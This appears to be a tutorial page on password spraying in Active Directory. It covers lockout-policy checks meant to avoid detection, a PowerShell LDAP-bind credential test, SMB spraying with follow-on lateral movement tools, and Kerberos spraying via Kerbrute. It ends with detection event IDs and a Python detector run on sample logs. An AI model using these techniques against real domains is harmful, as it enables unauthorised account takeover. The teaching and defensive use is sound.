Password Spraying

Password Policy

Before attempting any password attacks, check the domain's account lockout policy so you do not lock out accounts or trigger alerts. For instance, with the policy below (threshold 5, observation window 30 minutes), we can safely try 4 login attempts per user every 30 minutes (192 attempts per user per day):

# List the domain's password policy (Linux - NetExec)
nxc smb <target-ip> -u <user> -p <pass> --pass-pol

# List the account policy (Windows)
> net accounts
...
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
...

LDAP-Based

This method leverages LDAP binding through PowerShell's .NET libraries. It attempts authentication by creating an LDAP directory entry; if the bind succeeds, the credentials are valid. It is stealthy because it involves no interactive logon and respects the lockout policy, but it is slow and limited to one password per run.

This can be done manually: if the password is invalid, accessing the entry throws an error; otherwise it returns the domain's distinguished name. Automated scripts (LDAPSpray) also exist.

# Get the domain and PDC
$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domain.PdcRoleOwner.Name

# Construct the LDAP path
$ldap = "LDAP://$PDC/DC=" + $domain.Name.Replace('.', ',DC=')
# Attempt authentication
$entry = New-Object System.DirectoryServices.DirectoryEntry($ldap, "pete", "Nexus123!")

# Trigger authentication
$entry.distinguishedName  # Triggers authentication

SMB-Based

This method performs a full SMB session setup and teardown on every authentication attempt, so it is slow and noisy, and it does not respect the lockout policy.

If nxc reports (Pwn3d!), use psexec, wmiexec, or secretsdump for lateral movement or privilege escalation.

Kerberos-Based

This method leverages Kerberos AS-REQ messages to test user credentials without establishing a full authentication session. Each attempt requires only two UDP packets: an AS-REQ followed by either an AS-REP or an error response from the KDC. As a result, it is efficient and generates minimal network traffic compared to other authentication techniques. This approach is commonly used for password spraying and can be automated with tools such as Kerbrute, a cross-platform utility that sends AS-REQ requests at scale and interprets the responses to identify valid credentials.

In practice, this technique is well suited for horizontal brute-force attempts, where one or two common passwords are tested against a large list of users. Because each failed authentication still counts toward the domain's lockout policy, careless spraying can trigger account lockouts. From a detection perspective, this activity generates two specific Kerberos-related events in Windows logs which can be correlated to identify password spraying activity:

  • Event ID 4768 → A Kerberos authentication ticket (TGT) was requested

  • Event ID 4771 → Kerberos pre-authentication failed
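A defender-side correlation of those two events, as an added example that is not part of the original page: it groups failed 4768/4771 records by source address and flags a source that fails against many distinct accounts inside a short window, which separates spraying (one password, many users) from a brute force of a single account. The record field names and the sample events are constructed to resemble a Security-log export; the status codes 0x18 (4771, pre-authentication failed) and 0x6 (4768, client principal unknown) are the standard Kerberos ones.

```python
from collections import defaultdict
from datetime import datetime

# Status codes that mean a credential was guessed wrong: 4771 with 0x18 (bad
# password, pre-auth failed) and 4768 with 0x6 (client principal not found).
FAILURE_CODES = {4771: {"0x18"}, 4768: {"0x6"}}

# Constructed sample records (not real log data), shaped like the fields of the
# Security log: a one-password spray across many users from 10.0.0.50, a
# brute force of a single user from 10.0.0.51, and one successful TGT request.
SAMPLE_EVENTS = [
    {"EventID": 4771, "TimeCreated": "2024-05-01T09:00:00", "TargetUserName": "alice", "IpAddress": "10.0.0.50", "Status": "0x18"},
    {"EventID": 4771, "TimeCreated": "2024-05-01T09:00:02", "TargetUserName": "bob", "IpAddress": "10.0.0.50", "Status": "0x18"},
    {"EventID": 4771, "TimeCreated": "2024-05-01T09:00:04", "TargetUserName": "carol", "IpAddress": "10.0.0.50", "Status": "0x18"},
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:00:06", "TargetUserName": "dave", "IpAddress": "10.0.0.50", "Status": "0x6"},
    {"EventID": 4771, "TimeCreated": "2024-05-01T09:00:08", "TargetUserName": "erin", "IpAddress": "10.0.0.50", "Status": "0x18"},
    {"EventID": 4768, "TimeCreated": "2024-05-01T09:00:10", "TargetUserName": "frank", "IpAddress": "10.0.0.50", "Status": "0x0"},
    {"EventID": 4771, "TimeCreated": "2024-05-01T09:01:00", "TargetUserName": "bob", "IpAddress": "10.0.0.51", "Status": "0x18"},
    {"EventID": 4771, "TimeCreated": "2024-05-01T09:01:05", "TargetUserName": "bob", "IpAddress": "10.0.0.51", "Status": "0x18"},
    {"EventID": 4771, "TimeCreated": "2024-05-01T09:01:10", "TargetUserName": "bob", "IpAddress": "10.0.0.51", "Status": "0x18"},
]

def is_failed_guess(event):
    """True for a 4768/4771 record whose status code marks a wrong guess."""
    return event["Status"] in FAILURE_CODES.get(event["EventID"], set())

def detect_spraying(events, window_seconds=300, min_users=4):
    """Return {source_ip: sorted distinct accounts} for every source whose failed
    Kerberos authentications hit at least `min_users` distinct accounts inside
    some `window_seconds`-long interval. Many failures against ONE account from
    one source are brute force, not spraying, and are deliberately not flagged."""
    by_ip = defaultdict(list)
    for event in events:
        if is_failed_guess(event):
            when = datetime.fromisoformat(event["TimeCreated"])
            by_ip[event["IpAddress"]].append((when, event["TargetUserName"].lower()))
    hits = {}
    for ip, attempts in by_ip.items():
        attempts.sort()  # sliding window over this source's attempts, by time
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if (t - start).total_seconds() <= window_seconds}
            if len(users) >= min_users:
                hits[ip] = sorted(users)
                break
    return hits

if __name__ == "__main__":
    for ip, users in detect_spraying(SAMPLE_EVENTS).items():
        print(f"possible password spray from {ip}: {len(users)} accounts ({', '.join(users)})")
```

Tune `window_seconds` and `min_users` to the lockout policy shown above: a spray that stays under the threshold per user still shows up as many accounts per source.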

